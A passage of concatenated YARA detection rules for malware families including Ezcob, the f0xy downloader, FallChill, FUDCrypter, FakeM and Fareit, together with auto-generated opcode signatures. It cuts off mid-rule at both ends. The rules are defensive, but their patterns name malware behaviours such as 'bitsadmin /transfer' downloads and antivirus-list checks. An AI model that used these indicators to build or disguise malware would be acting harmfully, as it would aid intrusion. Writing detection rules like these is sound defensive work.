uint16(0) == 0x5a4d and filesize < 60KB and ( 1 of ($x*) or all of ($s*) or all of ($g*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule EzcobStrings : Ezcob Family { meta: description = "Ezcob Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-23" strings: $ = "\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12" $ = "\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12" $ = "Ezcob" wide ascii $ = "l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126" $ = "20110113144935" condition: any of them } rule Ezcob : Family { meta: description = "Ezcob" author = "Seth Hardy" last_modified = "2014-06-23" condition: EzcobStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule ws_f0xy_downloader { meta: description = "f0xy malware downloader" author = "Nick Griffin (Websense)" strings: $mz="MZ" $string1="bitsadmin /transfer" $string2="del rm.bat" $string3="av_list=" condition: ($mz at 0) and (all of ($string*)) } rule rc4_stack_key_fallchill { meta: description = "rc4_stack_key" ref = "https://www.us-cert.gov/ncas/alerts/TA17-318A" strings: $stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $stack_key } rule success_fail_codes_fallchill { meta: description = "success_fail_codes" ref = "https://www.us-cert.gov/ncas/alerts/TA17-318A" strings: $s0 = { 68 7a 34 12 00 } $s1 = { ba 7a 34 12 00 } $f0 = { 68 5c 34 12 00 } $f1 = { ba 5c 34 12 00 } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and (($s0 and $f0) or ($s1 and $f1)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule FUDCrypter { meta: description = "Detects unmodified FUDCrypt samples" reference = "https://github.com/gigajew/FudCrypt/" author = "https://github.com/hwvs" last_modified = "2019-11-21" strings: $ = "OcYjzPUtJkNbLOABqYvNbvhZf" wide ascii $ = "gwiXxyIDDtoYzgMSRGMckRbJi" wide ascii $ = "BclWgISTcaGjnwrzSCIuKruKm" wide ascii $ = "CJyUSiUNrIVbgksjxpAMUkAJJ" wide ascii $ = "fAMVdoPUEyHEWdxQIEJPRYbEN" wide ascii $ = "CIGQUctdcUPqUjoucmcoffECY" wide ascii $ = "wcZfHOgetgAExzSoWFJFQdAyO" wide ascii $ = "DqYKDnIoLeZDWYlQWoxZnpfPR" wide ascii $ = "MkhMoOHCbGUMqtnRDJKnBYnOj" wide ascii $ = "sHEqLMGglkBAOIUfcSAgMvZfs" wide ascii $ = "JtZApJhbFAIFxzHLjjyEQvtgd" wide ascii $ = "IIQrSWZEMmoQIKGuxxwoTwXka" wide ascii condition: 1 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule HTMLVariant : FakeM Family HTML Variant { meta: description = "Identifier for html variant of FAKEM" author = "Katie Kleemola" last_updated = "2014-05-20" strings: // decryption loop $s1 = { 8B 55 08 B9 00 50 00 00 8D 3D ?? ?? ?? 00 8B F7 AD 33 C2 AB 83 E9 04 85 C9 75 F5 } //mov byte ptr [ebp - x] y, x: 0x10-0x1 y: 0-9,A-F $s2 = { C6 45 F? (3?|4?) } condition: $s1 and #s2 == 16 } rule FakeM_Generic { meta: description = "Detects FakeM malware samples" author = "Florian Roth" reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" date = "2016-01-25" score = 85 hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3" hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520" hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60" hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3" hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8" hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d" hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5" hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90" hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33" hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e" hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b" strings: $a1 = "\\system32\\kernel32.dll" fullword ascii $a2 = "\\boot.lnk" fullword ascii $a3 = "%USERPROFILE%" fullword ascii /* Goodware String - occured 16 times */ $b1 = "Wizard.EXE" fullword wide $b2 = "CommandLineA" fullword ascii $c1 = "\\system32\\kernel32.dll" fullword ascii $c2 = "\\aapz.tmp" fullword ascii $e1 = "C:\\Documents and Settings\\A\\" fullword ascii $e2 = "\\svchost.exe" fullword ascii $e3 = "\\Perform\\Release\\Perform.pdb" fullword ascii $f1 = "Browser.EXE" fullword wide $f2 = "\\browser.exe" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and ( all of ($a*) or all of ($b*) or all of ($c*) or all of ($e*) or 1 of ($f*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-10-18 Identifier: Fareit Oct 2015 */ rule Fareit_Trojan_Oct15 { meta: description = "Detects Fareit Trojan from Sep/Oct 2015 Wave" author = "Florian Roth" reference = "http://goo.gl/5VYtlU" date = "2015-10-18" score = 80 super_rule = 1 hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3" hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997" hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d" hash4 = "76669cbe6a6aac4aa52dbe9d2e027ba184bf3f0b425f478e8c049637624b5dae" hash5 = "9486b73eac92497e703615479d52c85cfb772b4ca6c846ef317729910e7c545f" hash6 = "c3300c648aebac7bf1d90f58ea75660c78604410ca0fa705d3b8ec1e0a45cdd9" hash7 = "ff83e9fcfdec4ffc748e0095391f84a8064ac958a274b9684a771058c04cb0fa" strings: $s1 = "ebai.exe" fullword wide $s2 = "Origina" fullword wide condition: uint16(0) == 0x5a4d and $s1 in (0..30000) and $s2 in (0..30000) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule FavoriteCode : Favorite Family { meta: description = "Favorite code features" author = "Seth Hardy" last_modified = "2014-06-24" strings: // standard string hiding $ = { C6 45 ?? 3B C6 45 ?? 27 C6 45 ?? 34 C6 45 ?? 75 C6 45 ?? 6B C6 45 ?? 6C C6 45 ?? 3B C6 45 ?? 2F } $ = { C6 45 ?? 6F C6 45 ?? 73 C6 45 ?? 73 C6 45 ?? 76 C6 45 ?? 63 C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 } condition: any of them } rule FavoriteStrings : Favorite Family { meta: description = "Favorite Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-24" strings: $string1 = "!QAZ4rfv" $file1 = "msupdater.exe" $file2 = "FAVORITES.DAT" condition: any of ($string*) or all of ($file*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: YarGen Rule Generator Date: 2016-07-21 Identifier: NBXC4L ref = http://pastebin.com/raw/FdrnPwae */ /* Rule Set ----------------------------------------------------------------- */ rule d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9 { meta: description = "Auto-generated rule - file d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9.codex" author = "YarGen Rule Generator" reference = "not set" date = "2016-07-21" hash1 = "d1dc9b2905264da34dc97d6c005810fbcc99be1a6b4b41f883bb179dbcacba6e" strings: $s1 = ":&:-:=:J:O:\\:m:r:" fullword ascii $s2 = "6)6/666;6N6W6^6c6t6y6" fullword ascii $s3 = "666Q6V6b6g6~6" fullword ascii $s4 = "0%0,010A0F0K0\\0a0f0w0|0" fullword ascii $s5 = "6!6(63686E6J6W6\\6i6n6{6" fullword ascii $s6 = "3 3%33383=3J3R3`3e3o3t3~3" fullword ascii $s7 = "4 4'40454:4G4M4R4_4e4j4w4" fullword ascii $s8 = "1#1(141=1B1N1T1Y1e1k1p1|1" fullword ascii $s9 = "?(?2?<?C?J?Q?X?_?f?m?t?{?" fullword ascii $s10 = "?#?*?1?8???F?M?T?[?b?i?p?w?" fullword ascii $s11 = "6)6/646@6F6K6W6]6b6n6w6|6" fullword ascii $s12 = "4#40454:4G4L4Q4^4c4h4u4z4" fullword ascii $s13 = "<\"<'<3<8<=<I<N<S<_<d<i<u<z<" fullword ascii $s14 = ">%>/>9>@>G>N>U>\\>c>j>q>" fullword ascii $s15 = "WTZDAE" fullword ascii $s16 = "060>0E0K0P0\\0b0g0v0|0" fullword ascii $s17 = "4#4-474A4K4U4\\4f4p4z4" fullword ascii $s18 = "7\"7,767@7J7T7^7h7q7{7" fullword ascii $s19 = ";\";';4;E;J;W;k;p;};" fullword ascii $s20 = ";0;;;F;Q;\\;g;r;};" fullword ascii $op0 = { a1 b8 63 44 00 83 c4 14 53 ff 75 14 56 57 ff 90 } /* Opcode */ $op1 = { 8b d8 8b 45 08 8b 40 3a 81 c3 00 10 00 00 03 c3 } /* Opcode */ $op2 = { 5c 2d 44 00 c7 84 24 c0 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them ) } rule sig_7acb8d6d4c062c3097a7d31df103bc4d018519f9 { meta: description = "Auto-generated rule - file 7acb8d6d4c062c3097a7d31df103bc4d018519f9.codex" author = "YarGen Rule Generator" reference = "not set" date = "2016-07-21" hash1 = "e1607486cbb2d111d5df314fe58948aa0dc5897f56f7fd763c62bb30651380e3" strings: $s1 = "5(666Z6c6" fullword ascii $s2 = "Wlm;y%UD%d" fullword ascii $s3 = ";1;9;@;G;N;U;\\;c;j;q;x;" fullword ascii $s4 = "8 8'8.858<8C8J8Q8X8_8f8m8t8" fullword ascii $s5 = "2 2,282=2B2G2P2U2Z2_2h2s2x2" fullword ascii $s6 = "4'5.555<5C5J5Q5X5_5f5m5t5{5" fullword ascii $s7 = "0#0*01080?0F0M0T0[0b0i0p0w0" fullword ascii $s8 = "6$6,616=6B6G6S6X6]6i6n6s6" fullword ascii $s9 = "=\"=)=0=7=>=E=L=S=Z=a=h=" fullword ascii $s10 = "6&6-646;6B6I6P6W6^6e6l6s6z6" fullword ascii $s11 = "O.QrH@" fullword ascii $s12 = ">\">/>4>A>F>S>X>e>j>w>|>" fullword ascii $s13 = "0#0(040=0B0N0T0Y0e0k0p0|0" fullword ascii $s14 = "5)5/545@5F5K5W5`5e5q5w5|5" fullword ascii $s15 = "=!=&=3=8=E=N=S=`=e=s=x=}=" fullword ascii $s16 = ":(:/:6:=:D:K:R:Y:`:g:n:u:|:" fullword ascii $s17 = "7\"727<7F7M7W7a7k7u7" fullword ascii $s18 = "2+21262E2K2P2\\2h2m2|2" fullword ascii $s19 = ";/;5;:;G;V;\\;a;n;};" fullword ascii $s20 = ";\";-;8;C;N;^;i;t;" fullword ascii $op0 = { ff 44 24 14 8d 47 44 50 a1 08 63 44 00 ff 90 84 } /* Opcode */ $op1 = { 6d 43 00 c7 84 24 10 03 00 00 0c 6d 43 00 c7 84 } /* Opcode */ $op2 = { c7 43 0c 20 02 00 00 89 5d f0 ff 90 f8 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them ) } rule sig_5783b35b2eace55a5762df27fcb0b0fb28371b3e { meta: description = "Auto-generated rule - file 5783b35b2eace55a5762df27fcb0b0fb28371b3e.codex" author = "YarGen Rule Generator" reference = "not set" date = "2016-07-21" hash1 = "72513534f2e0f3e77a22023b887df3718c9df70686eb0ae58cbbde2f90f447e4" strings: $s1 = "B+P:\\6" fullword ascii $s2 = "6.666K6S6d6l6}6" fullword ascii $s3 = "0!0&0+0<0A0F0W0\\0a0n0z0" fullword ascii $s4 = ";#;);.;:;@;E;Q;W;\\;h;q;v;" fullword ascii $s5 = "2#2-222F2L2W2\\2b2g2x2~2" fullword ascii $s6 = "9\"9)90979>9E9L9S9Z9k9}9" fullword ascii $s7 = "6-747;7B7I7P7W7^7e7l7s7z7" fullword ascii $s8 = "4\"4'43494>4J4P4U4a4g4l4x4" fullword ascii $s9 = ":#:(:4:::?:K:T:Y:e:k:p:|:" fullword ascii $s10 = "WD.hyA" fullword ascii $s11 = "<\"<)<0<7<><E<L<S<Z<a<h<" fullword ascii $s12 = "=&=,=1=>=D=I=V=_=d=q=w=|=" fullword ascii $s13 = "; ;(;0;8;@;H;P;X;`;h;p;{;" fullword ascii $s14 = "<\"<)<0<7<><E<L<S<Z<a<h<o<v<" fullword ascii $s15 = "6#6(616;6@6I6S6X6d6n6s6|6" fullword ascii $s16 = "(%r-c;u" fullword ascii $s17 = "3%3G3N3U3\\3c3j3q3x3" fullword ascii $s18 = "7\"767T7[7b7i7p7w7~7" fullword ascii $s19 = "1 1-1>1C1P1a1f1s1" fullword ascii $s20 = "8 8&8,8A8M8^8d8i8" fullword ascii $op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */ $op1 = { a1 e0 79 44 00 57 ff 75 1c ff 90 78 01 00 00 83 } /* Opcode */ $op2 = { 3c ee 42 00 c7 84 24 8c } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them ) } rule sig_2fb404bdcebc7acbeb598f8a2ddbecf48c60b113 { meta: description = "Auto-generated rule - file 2fb404bdcebc7acbeb598f8a2ddbecf48c60b113.codex" author = "YarGen Rule Generator" reference = "not set" date = "2016-07-21" hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948" strings: $s1 = ":%:0:;:F:Q:\\:p:|:" fullword ascii $s2 = "6.666>6F6N6V6^6f6n6v6~6" fullword ascii $s3 = "6!6(6/666=6D6K6R6Y6r6:7" fullword ascii $s4 = "1t83jL.bjG" fullword ascii $s5 = "6!61666V6]6p6" fullword ascii $s6 = "2%2D2P2`2p2|2" fullword ascii $s7 = "42494@4G4N4U4\\4c4j4q4x4" fullword ascii $s8 = "9+92999@9G9N9U9\\9c9j9q9x9" fullword ascii $s9 = "4!4&43484E4J4W4\\4i4n4s4" fullword ascii $s10 = "5$5+52595@5G5N5U5\\5c5j5q5" fullword ascii $s11 = "1.252<2C2J2Q2X2_2f2m2t2{2" fullword ascii $s12 = "8 8%818:8?8K8Q8V8b8h8m8y8" fullword ascii $s13 = "9'93989=9B9K9P9U9Z9c9n9s9" fullword ascii $s14 = ":\":':,:8:=:B:R:Z:`:e:v:}:" fullword ascii $s15 = "=#=(=4=:=?=K=Q=V=b=k=p=|=" fullword ascii $s16 = "= =*=1=8=?=F=M=T=[=b=i=p=w=~=" fullword ascii $s17 = "3&3-343;3B3I3P3W3^3e3l3s3z3" fullword ascii $s18 = ":!:(:/:6:=:I:N:S:`:f:k:x:~:" fullword ascii $s19 = "cMDkAjy=" fullword ascii $s20 = "=#=/=4=9=E=J=O=[=`=e=q=v={=" fullword ascii $op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */ $op1 = { 3c ee 42 00 c7 84 24 8c } /* Opcode */ $op2 = { a1 e0 79 44 00 83 c4 0c ff 74 24 1c ff 90 3c 01 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them ) } /* Super Rules ------------------------------------------------------------- */ rule _84b76d765e7357fa5402b5af97d351424a8edf03_d0f90c1b3ebd79a816b5597a49ae8257df697591_da24c17f75cf0b7d6c5ab01832a827ee4b4c52eb_0 { meta: description = "Auto-generated rule - from files 84b76d765e7357fa5402b5af97d351424a8edf03.codex, d0f90c1b3ebd79a816b5597a49ae8257df697591.codex, da24c17f75cf0b7d6c5ab01832a827ee4b4c52eb.codex" author = "YarGen Rule Generator" reference = "not set" date = "2016-07-21" super_rule = 1 hash1 = "add7ed26bc5bcacdf3159fcde71bdd429feeef94dff7d3b22bc9af9deb471c48" hash2 = "a9a62edbafa5932894ed53319c924932b94a0ccdf15644764256eed39fd46d86" hash3 = "efcc9e0377cf83a73bd5fbe42a51a2330936b8e362fc2ab99af6d932079893d9" strings: $s1 = ":\":':,:5:=:B:K:P:U:^:c:h:q:v:{:" fullword ascii $s2 = "Y@.hdd \\" fullword ascii $s3 = "0$0+02090@0G0N0U0\\0c0j0v0{0" fullword ascii $s4 = "6\"6(6-6:6I6O6T6a6p6v6{6" fullword ascii $s5 = "1\"1/14191F1K1P1]1b1g1t1y1~1" fullword ascii $s6 = "0\"0(0-0<0B0G0S0_0d0s0y0~0" fullword ascii $s7 = "9\"9'959:9?9L9Q9^9c9p9y9~9" fullword ascii $s8 = "3%3*363=3B3N3T3Y3e3k3p3|3" fullword ascii $s9 = "4#4)4.4:4C4H4T4Z4_4k4q4v4" fullword ascii $s10 = "|&.WTm" fullword ascii $s11 = "6#63686E6J6W6\\6i6n6{6" fullword ascii $s12 = ";\";(;7;F;W;];f;o;{;" fullword ascii $s13 = "0+02080>0B0P0\\0i0|0" fullword ascii $s14 = "1 1(10181C1N1Y1d1o1z1" fullword ascii $s15 = "3 3%3*3;3@3E3R3^3c3t3y3" fullword ascii $s16 = "8\"8)8.8:8?8S8X8f8r8x8" fullword ascii $s17 = "8$8+82898@8G8N8U8\\8" fullword ascii $s18 = "9-929?9P9U9b9s9x9" fullword ascii $s19 = "9*9/9<9A9N9T9`9e9r9w9" fullword ascii $s20 = "2-292?2G2N2U2\\2c2j2q2" fullword ascii $op0 = { e0b34200c78424ac } /* Opcode */ $op1 = { 39750c598bd0598955fc7e4b0fb64c3e } /* Opcode */ $op2 = { 3cee4200c784248c } /* Opcode */ $op3 = { a1a8794400681c40430057ff90400100 } /* Opcode */ $op4 = { 395814eb31a1a879440057ff75f456ff } /* Opcode */ $op5 = { 663bd875438bc62b450c8945fceb038b } /* Opcode */ $op6 = { f24200c784245c01000010f24200c784 } /* Opcode */ $op7 = { 83c4108944241c8d4424345056ff7424 } /* Opcode */ $op8 = { 83c41483f8ff74138b4de88d04868b04 } /* Opcode */ $op9 = { 7cb34200c784249c } /* Opcode */ $op10 = { f8ae4300c78424e0 } /* Opcode */ $op11 = { 08b44200c78424b8 } /* Opcode */ $op12 = { 57568944241c50a1a8794400ff907801 } /* Opcode */ $op13 = { e0174300c78424d8 } /* Opcode */ $op14 = { 8b4dfc8b0481050410000050a1a87944 } /* Opcode */ $op15 = { 595985c00f8586010000685c5a4300ff } /* Opcode */ $op16 = { 595933c05e5f5bc9c3ff75c88b7508ff } /* Opcode */ $op17 = { 28424400c78424c4 } /* Opcode */ $op18 = { 83c4188945fc837dfc000f848f } /* Opcode */ $op19 = { 895dbc895dfcff90f8 } /* Opcode */ $op20 = { 595985c00f8543050000689c534300ff } /* Opcode */ $op21 = { ff90bc0200003d220000c075408d4424 } /* Opcode */ $op22 = { 383c4400c78424e0 } /* Opcode */ $op23 = { 85c07495eb03885dffa1a879440057ff } /* Opcode */ $op24 = { 6a01ff75acff75f46a00ff750ca1a879 } /* Opcode */ $op25 = { 40af4300c784240001000048af4300c7 } /* Opcode */ $op26 = { 836508005959668b4b02664966894802 } /* Opcode */ $op27 = { ff75108bd8ff750ca1a879440068385e } /* Opcode */ $op28 = { c4b34200c78424a8 } /* Opcode */ $op29 = { dc404400c7842498 } /* Opcode */ $op30 = { 30af4300c78424fc } /* Opcode */ $op31 = { bfb025440057894df0ff90c402000059 } /* Opcode */ $op32 = { 806a4300c78424f0 } /* Opcode */ $op33 = { 80ee4200c784249c } /* Opcode */ $op34 = { 1f4300c7842468020000141f4300c784 } /* Opcode */ $op35 = { 68feff0000ff750889442428a1a87944 } /* Opcode */ $op36 = { 897424688974246cff904803000085c0 } /* Opcode */ $op37 = { 85c00f8495fdffffff742414a1a87944 } /* Opcode */ $op38 = { 10184300c78424e8 } /* Opcode */ $op39 = { ff75fca1a8794400576868c64300688c } /* Opcode */ $op40 = { 59598945888b458cff308b458c83c004 } /* Opcode */ $op41 = { 595985c00f85130700006860524300ff } /* Opcode */ $op42 = { 603c4400c78424ec } /* Opcode */ $op43 = { 8b450cff742414668378023f50a1a879 } /* Opcode */ $op44 = { 595985c00f85fa010000680c5a4300ff } /* Opcode */ $op45 = { fcf84200c78424c0 } /* Opcode */ $op46 = { 14f94200c78424c8 } /* Opcode */ $op47 = { 3c6a4300c78424e8 } /* Opcode */ $op48 = { 88424400c78424d4 } /* Opcode */ $op49 = { 83c4188945fc837dfc000f8404010000 } /* Opcode */ $op50 = { 595985c00f8568020000ff75dca1a879 } /* Opcode */ $op51 = { 8b463a0345fc50a1a8794400ff900404 } /* Opcode */ $op52 = { 85c00f84cdfdffffff742414a1a87944 } /* Opcode */ $op53 = { a1a879440056ff90a0 } /* Opcode */ $op54 = { 40ae4300c78424b0 } /* Opcode */ $op55 = { 83c40cff7588ff7508a1a8794400ff90 } /* Opcode */ $op56 = { 68585c4300ff7588a1a8794400ff9090 } /* Opcode */ $op57 = { 78274300c78424b0 } /* Opcode */ $op58 = { 3d230000c0740b3d050000800f85c7 } /* Opcode */ $op59 = { a1a879440068345f440057ff90f40300 } /* Opcode */ $op60 = { 0fbf40483b45cc751d508b45e483c04c } /* Opcode */ $op61 = { 836424180059598bd8c74424207cb542 } /* Opcode */ $op62 = { 681c5c4300ff7588a1a8794400ff9090 } /* Opcode */ $op63 = { 5c284300c78424f0 } /* Opcode */ $op64 = { 59593bc3744a837dcc00741fff75f8a1 } /* Opcode */ $op65 = { 60f94200c78424d8 } /* Opcode */ $op66 = { 94274300c78424b8 } /* Opcode */ $op67 = { 895c2440895c2444ff90c40300005959 } /* Opcode */ $op68 = { 8bd859598d45ec50a1a87944008d7b02 } /* Opcode */ $op69 = { ff90680100008bf08d45fc50a1a87944 } /* Opcode */ $op70 = { a1a879440068e85e440057ff90f40300 } /* Opcode */ $op71 = { ff45f88d474450a1a8794400ff909803 } /* Opcode */ $op72 = { ff45f88d474450a1a8794400ff909803 } /* Opcode */ $op73 = { 44b44200c78424d0 } /* Opcode */ $op74 = { 595985c0754f6834584300ff75b8a1a8 } /* Opcode */ $op75 = { 8b44242483c00450ff7508e824e6ffff } /* Opcode */ $op76 = { 60404400c7842488 } /* Opcode */ $op77 = { 6a1a4000c781a40100004eaa4100c781 } /* Opcode */ $op78 = { 8bf859593bfe750433c0eb353975107e } /* Opcode */ $op79 = { 59596a055e3bc775103935d479440075 } /* Opcode */ $op80 = { 8975ec8975f0ff900c0300005f5e85c0 } /* Opcode */ $op81 = { 8975ec8975f0ff900c0300005f5e85c0 } /* Opcode */ $op82 = { 57ff75088945dca1a8794400ff90b8 } /* Opcode */ $op83 = { 583b4400c7842488 } /* Opcode */ $op84 = { 83c40c8b45fc8b4df489086881 } /* Opcode */ $op85 = { 0c274300c7842490 } /* Opcode */ $op86 = { 2c184300c78424f4 } /* Opcode */ $op87 = { a1a879440068185f440057ff90f40300 } /* Opcode */ $op88 = { ff7424148bf0a1a879440056ff90fc } /* Opcode */ $op89 = { a1a87944006894e5430053ff9090 } /* Opcode */ $op90 = { 8d44240c50a1a8794400ff90f8010000 } /* Opcode */ $op91 = { 85c00f95c0595984c0743dff75f4a1a8 } /* Opcode */ $op92 = { 59598bf8eb308d471050ff75fca1a879 } /* Opcode */ $op93 = { 50ff750ca1a879440057ff90ac020000 } /* Opcode */ $op94 = { 595985c00f856901000068705a4300ff } /* Opcode */ $op95 = { 914300c784245806000014914300c784 } /* Opcode */ $op96 = { a1a87944006a006870e04300ff7508ff } /* Opcode */ $op97 = { b0684300c78424ac } /* Opcode */ $op98 = { 8b433a8b4dfc8d048803c650a1a87944 } /* Opcode */ $op99 = { 04414400c78424a0 } /* Opcode */ $op100 = { 883b4400c784249c } /* Opcode */ $op101 = { 30284300c78424e4 } /* Opcode */ $op102 = { c6059179440001892d9c794400892598 } /* Opcode */ $op103 = { c6059179440001892d9c794400892598 } /* Opcode */ $op104 = { 595985c00f85340200006804564300ff } /* Opcode */ $op105 = { a13ca0420089819c030000a118a04200 } /* Opcode */ $op106 = { 595985c00f858b02000068bc554300ff } /* Opcode */ $op107 = { 6c684300c78424a0 } /* Opcode */ $op108 = { 83c4108945ec8d45bc50a1a879440056 } /* Opcode */ $op109 = { f0424400c78424e0 } /* Opcode */ $op110 = { 30f84200c7842494 } /* Opcode */ $op111 = { 8bf0a1a879440068b4b7420056ff90fc } /* Opcode */ $op112 = { 595985c00f850905000068b8534300ff } /* Opcode */ $op113 = { 595985c0756868b85b4300ff7588a1a8 } /* Opcode */ $op114 = { a1a8794400beff7f00005653ff90b8 } /* Opcode */ $op115 = { 595985c075686818584300ff75b8a1a8 } /* Opcode */ $op116 = { 83c4148bc65ec3558bec83ec14837d0c } /* Opcode */ $op117 = { 85c0a1a8794400750f5653ff902c0100 } /* Opcode */ $op118 = { 3d220000c0740732c0e9be } /* Opcode */ $op119 = { b4434400c7842400010000c4434400c7 } /* Opcode */ $op120 = { ff75f88d431050ff7508a1a8794400ff } /* Opcode */ $op121 = { 48f94200c78424d4 } /* Opcode */ $op122 = { ff75f4a1a879440053683cc843006854 } /* Opcode */ $op123 = { ff75fca1a8794400576814c743006830 } /* Opcode */ $op124 = { 81f9d03f00000f8e9c } /* Opcode */ $op125 = { 689461440068b06144008bf8a1a87944 } /* Opcode */ $op126 = { b0ad4300c7842488 } /* Opcode */ $op127 = { 85c07581881e837dfc02752c8d45d450 } /* Opcode */ $op128 = { ff75fca1a87944005768e0c6430068fc } /* Opcode */ $op129 = { ff751050ff7508a1a8794400ff905001 } /* Opcode */ $op130 = { ff750c8945f86898e143006854e24300 } /* Opcode */ $op131 = { 59598bf08d45f450a1a8794400680780 } /* Opcode */ $op132 = { 83c40cff75fcff7508a1a8794400ff90 } /* Opcode */ $op133 = { 83c40cff75fcff7508a1a8794400ff90 } /* Opcode */ $op134 = { 83c40cff75fcff7508a1a8794400ff90 } /* Opcode */ $op135 = { ff75fca1a87944006a0268a0c7430068 } /* Opcode */ $op136 = { 8b50245685d20f8ee2 } /* Opcode */ $op137 = { d4424400c78424dc } /* Opcode */ $op138 = { 68feff0000ff7508ff90b8 } /* Opcode */ $op139 = { a8414400c78424b4 } /* Opcode */ $op140 = { 595985c00f858601000068ac564300ff } /* Opcode */ $op141 = { 595985c0756868905c4300ff7588a1a8 } /* Opcode */ $op142 = { 8365f8008365fc00578b7d0c85ff0f84 } /* Opcode */ $op143 = { 80751583780800740fa1a87944005756 } /* Opcode */ $op144 = { 85c07579ff74241ca1a8794400ff750c } /* Opcode */ $op145 = { 83c428381dad7944007419ff75f8a1a8 } /* Opcode */ $op146 = { a0ae4300c78424c8 } /* Opcode */ $op147 = { 25a24100c781d40300008c514100c781 } /* Opcode */ $op148 = { 595985c00f85b204000068f0534300ff } /* Opcode */ $op149 = { 85c074b6ff75fca1a8794400ff906002 } /* Opcode */ $op150 = { 8975d8894ddc8975e48975e8ff90bc02 } /* Opcode */ $op151 = { e0674300c7842488 } /* Opcode */ $op152 = { 58694300c78424cc } /* Opcode */ $op153 = { 50284300c78424ec } /* Opcode */ $op154 = { 595985c00f85dd0100006840564300ff } /* Opcode */ $op155 = { 595985c0751d68105c4300ff7588a1a8 } /* Opcode */ $op156 = { f4f94200c78424f8 } /* Opcode */ $op157 = { 98164300c7842490 } /* Opcode */ $op158 = { b54200c784240801000010b54200c784 } /* Opcode */ $op159 = { acf94200c78424e4 } /* Opcode */ $op160 = { a1a87944008d5f106814de430053ff90 } /* Opcode */ $op161 = { 08af4300c78424e8 } /* Opcode */ $op162 = { 20184300c78424ec } /* Opcode */ $op163 = { 56689c56440068ff7f00008945f850a1 } /* Opcode */ $op164 = { 8d45f850a1a8794400ff90f801000083 } /* Opcode */ $op165 = { 595985c00f85c001000068345a4300ff } /* Opcode */ $op166 = { 83c4188945fc837dfc00752a6880 } /* Opcode */ $op167 = { 5f3d230000c075578b45ec03c0668945 } /* Opcode */ $op168 = { 4c174300c78424b4 } /* Opcode */ $op169 = { 8b45a4595985c075038b45b005001000 } /* Opcode */ $op170 = { 8bd8595985db0f8490 } /* Opcode */ $op171 = { a8ef4200c78424ec } /* Opcode */ $op172 = { b870794400bf34b042002bc78945e40f } /* Opcode */ $op173 = { 9cf94200c78424e0 } /* Opcode */ $op174 = { 595985c00f853508000068bc514300ff } /* Opcode */ $op175 = { 85c07405e9ef100000ff7514ff75c8ff } /* Opcode */ $op176 = { 24f94200c78424cc } /* Opcode */ $op177 = { ff7518ff75145753ff908402000083c4 } /* Opcode 